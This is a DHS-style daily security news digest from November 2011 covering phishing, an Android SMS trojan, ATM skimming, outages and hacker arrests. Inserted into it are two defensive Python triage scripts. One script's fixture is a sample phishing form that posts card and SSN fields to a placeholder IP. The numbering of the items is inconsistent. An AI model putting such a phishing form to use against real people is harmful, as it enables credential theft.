32. November 27, San Jose Mercury News – (International) Spotify music service resumes after login problems for users in U.S. and Europe. Users of the Spotify streaming music service were again able to log in the afternoon of November 27 after an outage that lasted several hours and affected users in the United States and Europe. The company did not explain what went wrong, but said in a tweet about 3 p.m. Pacific time that it had identified the problem. Beginning at some point before 1 p.m. Pacific time November 27, some Spotify users trying to log in to the popular music streaming service were greeted with error messages, sparking a flurry of tweets complaining the company was not keeping users informed. Spotify’s service status page reported “All systems are up and feeling jolly good” as of 1 p.m. Pacific time. But users trying to log in via the desktop or mobile client were receiving 404 errors. An attempt to log into an account on the Spotify.com Web site generated the error message: “Service Temporarily Unavailable. The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.” Spotify users from Spain, France, the United Kingdom, and the United States took to Twitter to complain. Source: http://www.mercurynews.com/business/ci_19421484?source=rss

Monday, November 28, 2011

Complete DHS Daily Report for November 28, 2011

Daily Report

Top Stories

• U.S. and Philippine authorities arrested four members of a hacker collective, allegedly funded by terrorists, suspected of hacking wireless provider AT&T and causing millions of dollars in damages. – Softpedia See item 35 below in the Communications Sector

• Shoppers looking for deals November 24 and 25 ran into numerous problems, with 20 injured by pepper spray at a Wal-Mart in Porter Ranch, California, and several others shot in parking lots. – Los Angeles Times (See item 39)

39. November 25, Los Angeles Times – (California; South Carolina) Shootings, pepper-spray attack mar Wal-Mart Black Friday sales. As shoppers converged on retailers around the country looking for Black Friday deals November 24 and 25, authorities reported scattered problems. In Porter Ranch, California, a woman pepper sprayed customers at a Wal-Mart in what authorities said was a deliberate attempt to get more “door buster” merchandise. In San Leandro, California, a Wal-Mart shopper walking to his car was shot and wounded in a suspected robbery early November 25. Another shooting was reported in a parking lot next to a Wal-Mart in South Carolina, also a suspected robbery attempt. Officials told WMBF 32 Myrtle Beach they believe the robbery was tied to Black Friday. At Porter Ranch, 20 customers, including children, were hurt in the 10:10 p.m. incident, officials said. Shoppers complained of minor skin and eye irritation, and sore throats. The woman used the spray in more than one area of the Wal-Mart “to gain preferred access to a variety of locations in the store,” said a Los Angeles fire captain. Police were searching for the woman but said they have had trouble getting a clear description of her. Black Friday sales began at the Wal-Mart at 10 p.m. Source: http://latimesblogs.latimes.com/lanow/2011/11/wal-mart-black-friday-marred-by-shootings-pepper-spray-attack-.html

Details

Banking and Finance Sector

9. November 25, Help Net Security – (International) ‘PayPal email address change’ phishing scheme doing rounds. PayPal users have been targeted again as e-mails supposedly sent by the online payment company urge them to fill out a form with their personal and financial information to prevent the suspension of their accounts, Help Net Security reported November 25. With “You have changed your PayPal email address” in the subject line, the sender attempts to convince the recipient that someone has accessed their account and changed the e-mail address. To “keep the original email and restore their PayPal account,” the users must fill out an attached Personal Profile Form - PayPal-.htm form. For everything to go smoothly, the sender also “helpfully” notes “the form needs to be opened in a modern browser which has javascript enabled (ex: Internet Explorer 7, Firefox 3, Safari 3, Opera 9).” But for those who fall for this scam, the submitted information gets sent directly to the phishers, Sophos points out. Source: http://www.net-security.org/secworld.php?id=12003

10. November 23, Darien Times – (Connecticut; Massachusetts; Rhode Island) Three indicted for pinhole camera ATM scam. Police in Darien, Connecticut, arrested two more people in connection to an ATM skimming scam at the Bank of America in June, the Darien Times reported November 23. A New York resident was previously arrested in June. Assisted by the Connecticut Financial Crimes Task Force and the Secret Service, Darien Police connected the crime in Darien to two New York residents. On November 15, a federal grand jury handed down an indictment, charging the three New York residents with conspiracy, bank fraud, and identity theft offenses related to their alleged participation in the scheme across southern New England. The indictment claims, between February 2011 and July 2011, the three conspirators and others conspired to install skimming devices on ATMs at 11 banks and one credit union in Connecticut, Massachusetts, and Rhode Island. The co-conspirators used the stolen information captured by the skimming devices and pinhole cameras to create counterfeit bank cards that allowed them to withdraw funds from the customers’ accounts. One of the conspirators is familiar to law enforcement and perpetrated similar crimes in Massachusetts, Connecticut, and Rhode Island, police said. Police believe he is responsible for 26 similar incidents in the same states. He has been detained in state custody since his arrest in Darien June 20. The other two men were arrested November 2 and November 4. Both are detained in federal custody. The charges of conspiracy to commit bank fraud and bank fraud carry a maximum prison sentence of 30 years and up to $1 million in fines, on each count. The charge of aggravated identity theft carries a mandatory prison sentence of 2 years, which must be imposed consecutively to a sentence imposed on any other count of conviction. Source: http://www.darientimes.com/news/darien-features/local-news/5001890.html

11. November 22, CNNMoney – (National) FDIC’s list of problem banks shrinks. The number of banks at risk of failing fell in the third quarter of 2011, marking the second straight quarterly decline, according to a government report issued November 22. Banks deemed troubled by the Federal Deposit Insurance Corporation (FDIC) dropped by 21 to 844, the agency said in its quarterly survey. The so-called problem bank list is comprised of institutions considered most likely to fail, though few actually reach that point. Only 26 of the nation’s 7,436 banks failed in the quarter, 15 fewer than in 2010. And so far in 2011, only 90 banks have failed, compared with 149 at this time in 2010. The FDIC’s report also showed the banking sector generated the highest profit levels since the second quarter of 2007 — before the financial crisis. The report said 14.3 percent of institutions reported a net loss during the third quarter, the smallest proportion since the first quarter of 2008. Banks earned nearly $35.3 billion in the third quarter, according to the FDIC, up from $23.8 billion from the same quarter in 2010. Source: http://money.cnn.com/2011/11/22/markets/fdic_bank_list/

Information Technology

32. November 25, Softpedia – (International) Android monitoring software hides SMS trojan. Kaspersky Lab experts came across what looks like a legitimate application for monitoring and managing SMSs, calls, and Internet traffic on an Android smartphone, but which conceals a trojan that sends messages to premium-rate numbers once it lands on a device. The application targets users in countries such as Belgium, France, Switzerland, Luxembourg, Germany, Spain, and Canada, which suggests the cybercriminals have extended their operations from China and Russia to Europe and North America. Upon closer inspection, the app, hosted on the Web as SuiConFo, was found to hide an SMS trojan identified as Trojan-SMS.AndroidOS.Foncy, which sends four short messages to premium-rate numbers. To make the software look as legitimate as possible, its creators made sure an icon appears in the phone’s menu, but once it is launched an error pops up claiming the Android version is not compatible. Right after the error, the trojan uses two public methods to determine the ISO country code of the SIM card. Based on this code, it sends the four SMSs to one of eight destinations. The malware not only sends short messages but also hides incoming SMSs from certain numbers, so that reply messages from the premium numbers are not seen by the victim. The trojan is also programmed to send alerts to a French cell phone number, based on the replies received from the premium numbers, so the developers know how many victims they have. Because such trojans can generate considerable income, it is likely these operations will be extended to citizens of other countries. Source: http://news.softpedia.com/news/Android-Monitoring-Software-Hides-SMS-Trojan-236641.shtml
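The behaviour described above leaves a footprint in the app’s manifest that an analyst can check before running anything. The script below is an added example (it is not Kaspersky’s detection logic and does not claim to identify Foncy): it parses a decoded AndroidManifest.xml and flags the combination of the SEND_SMS permission with a high-priority receiver for incoming SMS. On the Android releases current in 2011, SMS_RECEIVED was an ordered broadcast, so such a receiver sees every incoming text before the stock messaging app and can call abortBroadcast() to hide it, which is what an SMS trojan needs in order to suppress replies from premium numbers. The two manifests below are constructed; the package and class names are placeholders.

```python
"""Static triage of an Android manifest for the SMS-trojan pattern.

Added example; not Kaspersky Lab's detection logic. Input is a decoded
AndroidManifest.xml (as produced by apktool or similar), given as a string.
"""
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
SMS_RECEIVED = "android.provider.Telephony.SMS_RECEIVED"
SEND_SMS = "android.permission.SEND_SMS"
RECEIVE_SMS = "android.permission.RECEIVE_SMS"


def _android_attr(elem, name):
    """Read an android:-namespaced attribute from a manifest element."""
    return elem.get("{%s}%s" % (ANDROID_NS, name))


def sms_receivers(root):
    """Yield (receiver class, filter priority) for SMS_RECEIVED receivers."""
    for receiver in root.iter("receiver"):
        for flt in receiver.findall("intent-filter"):
            actions = {_android_attr(a, "name") for a in flt.findall("action")}
            if SMS_RECEIVED in actions:
                priority = int(_android_attr(flt, "priority") or 0)
                yield _android_attr(receiver, "name"), priority


def triage_manifest(manifest_xml):
    """Return (suspicious, findings) for a decoded manifest.

    The signal is the combination: the app may send SMS itself AND it
    registers an SMS_RECEIVED receiver with an elevated priority (the
    precondition for hiding incoming texts via abortBroadcast()). Legitimate
    SMS apps can match too, so this is a triage hint, not a verdict.
    """
    root = ET.fromstring(manifest_xml)
    perms = {_android_attr(p, "name") for p in root.iter("uses-permission")}
    findings = []
    if SEND_SMS in perms:
        findings.append("requests SEND_SMS")
    if RECEIVE_SMS in perms:
        findings.append("requests RECEIVE_SMS")
    elevated_receiver = False
    for cls, priority in sms_receivers(root):
        findings.append(f"{cls} filters SMS_RECEIVED at priority {priority}")
        if priority > 0:
            elevated_receiver = True
    return SEND_SMS in perms and elevated_receiver, findings


# Constructed manifests (placeholder package and class names).
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.smsmonitor">
  <uses-permission android:name="android.permission.SEND_SMS"/>
  <uses-permission android:name="android.permission.RECEIVE_SMS"/>
  <application android:label="SMS Monitor">
    <activity android:name=".MainActivity"/>
    <receiver android:name=".IncomingSmsReceiver">
      <intent-filter android:priority="2147483647">
        <action android:name="android.provider.Telephony.SMS_RECEIVED"/>
      </intent-filter>
    </receiver>
  </application>
</manifest>
"""

BENIGN_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.notes">
  <uses-permission android:name="android.permission.INTERNET"/>
  <application android:label="Notes">
    <activity android:name=".MainActivity"/>
  </application>
</manifest>
"""

if __name__ == "__main__":
    for label, manifest in (("sample", SAMPLE_MANIFEST), ("benign", BENIGN_MANIFEST)):
        suspicious, findings = triage_manifest(manifest)
        print(label, "suspicious" if suspicious else "clean", findings)
```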

33. November 25, H Security – (International) Paragon programming language identifies security vulnerabilities. A researcher from Sweden’s University of Gothenburg developed a programming language that can be used to identify security vulnerabilities in the information flow of applications as they are being developed. Paragon was created as part of his dissertation entitled “Practical, Flexible Programming with Information Flow Control.” It is an extension to the Java programming language and, according to the researcher, can easily be integrated into existing Java applications. Source: http://www.h-online.com/security/news/item/Paragon-programming-language-identifies-security-vulnerabilities-1385148.html

34. November 24, The Register – (International) Thanksgiving menaced by virus-laden fake iTunes vouchers. E-mails containing supposed iTunes gift certificates doing the rounds in the run-up to Thanksgiving were actually loaded with malware, The Register reported November 24. Spoofed e-mails purportedly offering $50 vouchers for the iTunes Store, which arrive with e-mail subject lines such as “iTunes Gift Certificate,” come with an attachment supposedly containing a certificate code. In reality, these zip file attachments are infected with the Windows PC-compatible malware, detected by Sophos as BredoZp-B and first spotted by German info security group eleven-security. Source: http://www.theregister.co.uk/2011/11/24/fake_itunes_gift_cert_malware/
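Items 9 and 34 describe the two attachment tricks that carried both campaigns: an HTML form mailed as a file that posts the victim’s details to the phisher, and a zip archive whose “gift certificate” is a Windows executable. The script below is an added example (not code from Sophos, Help Net Security, or The Register) that triages both kinds of attachment offline: it extracts every form action from an HTML file and reports those that do not post to the brand’s own domain, and it lists executable members inside a zip. The HTML sample and the in-memory zip are constructed; the address in the form action is a documentation range, not a real phishing host.

```python
"""Offline triage of mailed attachments: HTML forms and zip archives.

Added example; sample inputs are constructed, not real phishing samples.
"""
import io
import zipfile
from html.parser import HTMLParser
from urllib.parse import urlparse


class FormActionExtractor(HTMLParser):
    """Collect the action URL of every <form> in an HTML document."""

    def __init__(self):
        super().__init__()
        self.actions = []

    def handle_starttag(self, tag, attrs):
        if tag == "form":
            self.actions.append(dict(attrs).get("action") or "")


def foreign_form_actions(html, expected_domain):
    """Return form actions that do not post to expected_domain or a subdomain.

    A relative action (no host) is reported as well: inside a mailed .htm
    file it cannot resolve to the brand's site, so it is never legitimate.
    """
    parser = FormActionExtractor()
    parser.feed(html)
    foreign = []
    for action in parser.actions:
        host = urlparse(action).hostname or ""
        if host != expected_domain and not host.endswith("." + expected_domain):
            foreign.append(action)
    return foreign


# Extensions Windows will run directly when the user double-clicks.
EXECUTABLE_SUFFIXES = (".exe", ".scr", ".pif", ".com", ".bat", ".cmd", ".js", ".vbs")


def executables_in_zip(data):
    """Return member names inside a zip (given as bytes) that look executable."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            if name.lower().endswith(EXECUTABLE_SUFFIXES):
                hits.append(name)
    return hits


# --- constructed samples -------------------------------------------------
SAMPLE_FORM_HTML = """
<html><body>
<h1>Personal Profile Form</h1>
<form method="post" action="http://203.0.113.10/cgi-bin/collect.php">
  <input name="card"><input name="ssn"><input type="submit">
</form>
</body></html>
"""


def make_sample_zip():
    """Build, in memory, a zip shaped like the fake gift-certificate attachment."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("iTunes_Gift_Certificate.exe", b"MZ placeholder, not a real binary")
        zf.writestr("readme.txt", b"your certificate code is inside")
    return buf.getvalue()


if __name__ == "__main__":
    print(foreign_form_actions(SAMPLE_FORM_HTML, "paypal.com"))
    print(executables_in_zip(make_sample_zip()))
```

Both checks are cheap enough to run on every inbound attachment at the mail gateway; the form-action check in particular catches the “fill out the attached form” scheme regardless of how convincing the page looks, because the data has to go somewhere.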

For more stories, see item 9 above in the Banking and Finance Sector and items 35 and 36 below in the Communications Sector

Communications Sector

35. November 25, Softpedia – (International) Terrorist-funded Filipino hackers arrested. U.S. and Philippine authorities arrested four members of a hacker collective suspected of being funded by terrorists and of attempting a hack on AT&T, Softpedia reported November 25. The investigation that led to the arrests began in March, when the FBI requested the aid of the Criminal Investigation and Detection Group’s Anti-Transnational and Cyber Crime Division (CIDG-ATCCD) concerning a hacking operation that targeted the wireless services provider AT&T. The suspects, aged between 21 and 31 and allegedly financed by a Saudi Arabian terrorist group, caused $2 million in damages, the Manila SunStar reported. The hackers were taken into custody after the FBI and the ATCCD raided several locations in the Metro Manila area, where numerous pieces of computer and telecommunications equipment believed to have been used in the attacks were seized. One of the hackers had been arrested before, in 2007, as a result of an operation by the FBI and Philippine authorities against terrorist organizations. The ATCCD chief said that in 1999, when the FBI was investigating a series of hacking operations targeting telecoms companies, it uncovered a trail of banking records linking local hackers to terrorists. Criminal organizations in Pakistan and India also appear to be connected: in 2007, a Pakistani man suspected of funding operations in India also supplied the funds for the Filipinos. Source: http://news.softpedia.com/news/Terrorist-Funded-Filipino-Hackers-Arrested-236560.shtml

36. November 24, CableMuse.com – (International) MSN Thanksgiving outage. Hundreds, potentially thousands, of Microsoft MSN Premium customers experienced a major network outage the morning of November 24. Instead of being able to log into MSN Premium, users received an error code (23) indicating difficulty with the sign-in server. An MSN technical source reported at least 300 calls regarding the outage between 8:45 and 9:25 a.m. He stated that potentially thousands of customers were impacted and that MSN was trying to locate the server(s) and correct the issues. The MSN technical representative also stated it was likely caused by too many people signing in at the same time. Service was restored to most if not all MSN Premium customers at about 11 a.m. November 24, more than 3 hours after the outage began. Source: http://www.cablemuse.com/cmn188er23.html

37. November 24, Aviation Week – (International) Software fix could save Globalstar sat. Mobile satellite services provider Globalstar Inc. and European satellite manufacturer Thales Alenia Space announced an agreement that could return one of the Louisiana-based company’s second-generation telecom satellites to service, Aviation Week reported November 24. Over the coming months, Thales Alenia Space will develop and upload software to the satellite, which currently suffers from a mechanical glitch affecting two momentum wheels designed to keep the spacecraft in a stable position in orbit. Although the software fix is not expected to repair the wheels, it should adapt the satellite’s current in-flight configuration to allow it to return to service. The defective momentum wheels, built by North Carolina-based Goodrich Corp., affected two of the six satellites Globalstar launched in October 2010. If the new software fix works, a Thales spokesman said it could be uploaded to other satellites suffering momentum wheel defects in the future, if necessary. Globalstar is now looking at a different issue affecting momentum wheels on a second tranche of six second-generation satellites launched in July, and may delay the launch of a third batch of satellites currently planned for December. Source: http://www.aviationweek.com/aw/generic/story.jsp?id=news/asd/2011/11/23/12.xml&headline=Software

38. November 23, Mobile TV Examiner – (Alabama) Local Comcast customers lose APT IQ programming again. By the week of November 21, cable television customers of Comcast Cablevision of Mobile, Alabama, lost access to APT IQ programming from Alabama Public Television (APT) through their digital transport adapters or digital TV receivers (set-top boxes) provided by Comcast. The last time local customers of Comcast could not access APT IQ programming through cable TV was late August. Like the previous time, instead of APT IQ programming, TV sets connected to digital transport adapters displayed the words “We’ve detected an interruption in your service” and TV sets connected to digital TV receivers displayed the words “One moment please. This channel should be available shortly” with the reference code “S0a00.” While APT IQ programming was inaccessible through Comcast, WEIQ-TV continued to broadcast programming over the air on digital sub-channel 42-2, along with APT Create programming on digital sub-channel 42-3, and Alabama Public Television’s main programming on channel 42-1. Source: http://www.examiner.com/tv-in-mobile/local-comcast-customers-lose-apt-iq-programming-again

For another story see item 32 in the Information Technology Sector